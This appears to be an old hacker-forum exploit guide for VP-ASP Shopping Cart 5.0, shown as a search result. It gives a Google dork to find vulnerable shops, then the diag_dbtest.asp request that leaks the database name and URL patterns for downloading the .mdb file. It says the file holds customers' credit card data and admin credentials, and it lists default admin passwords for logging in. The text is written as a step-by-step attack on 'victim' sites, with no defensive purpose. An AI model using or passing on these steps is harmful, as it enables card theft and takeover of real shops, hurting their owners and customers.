Search result for 'diag_dbtest.asp'
1 pages : 1
VP-ASP Shopping Cart Version 5.0 Google style by fris <firstname.lastname@example.org> Finding VP-ASP 5.00 Sites in Google: In google type: intitle:VP-ASP Shopping Cart 5.00 You will find many websites with VP-ASP 5.00 cart software installed Now lets goto the exploit the page will be like this: ****://***.victim.com/shop/shopdisplaycategories.asp The exploit is : diag_dbtest.asp so you want to do this: ****://***.victim.com/shop/diag_dbtest.asp A page will appear that contains: xDatabase shopping140 xDblocation resx xdatabasetypexEmailxEmailNamexEmailSubjectxEmailSystemxEmailTypexOrdernumber The most important thing here is xDatabase xDatabase: shopping140 ok now the url will be like this: ****://***.victim.com/shop/shopping140.mdb if you didn't download the db try this while there is db location. xDblocation resx the url will be: ****://***.victim.com/shop/resx/shopping140.mdb If u see the error message you can try this: ****://***.victim.com/shop/shopping500.mdb download the mdb file and you should be able to open it with any mdb file viewer, most people have ms access for you windows people, open office for you *nix people, or you can goto download.com and get a .mdb viewer. inside the .mdb you should be able to find credit card information. and you should even be able to find the admin username and password for the website. the admin login page is usually located at ****://***.victim.com/shop/shopadmin.asp if you cannot find the admin username and password in the mdb file or you can but it is incorrect, or you cannot find the mdb file at all then try to find the admin login page and enter the default passwords which are Username: admin password: admin or Username: vpasp password: vpasp ------ eof. shouts out to mosthated, ghettodmx, evian s sim, ragz, TFreak, and Paige
VP-ASP Shopping Cart version 5.x stores sensitive user data in .mdb files.